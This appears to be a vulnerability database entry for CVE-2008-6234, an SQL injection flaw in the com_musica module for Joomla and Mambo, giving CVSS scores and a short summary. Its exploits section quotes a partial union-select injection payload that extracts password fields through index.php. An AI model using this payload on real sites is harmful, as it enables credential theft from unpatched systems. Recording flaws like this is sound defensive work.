7.5
CVSSv2

CVE-2008-6234

Published: 21/02/2009 Updated: 11/10/2018
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 755
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

SQL injection vulnerability in the com_musica module in Joomla! and Mambo allows remote malicious users to execute arbitrary SQL commands via the id parameter to index.php.

Vulnerable Product Search on Vulmon Subscribe to Product

joomla com musica -

mambo-foundation com musica -

Exploits

Aria-Security Team (Persian Security Network) Aria-SecurityNet ------------------------------- Shoutz : AurA, imm02tal, Kinglet, iM4N, & All our staff Mambo com_Musica "id" Remote SQL Injection indexphp?option=com_musica&Itemid=172&tasko=viewo &task=view2&id=-4214/**/union+select/**/0,0,password,0,0,0,0,0,0,0,0,0,1,1, ...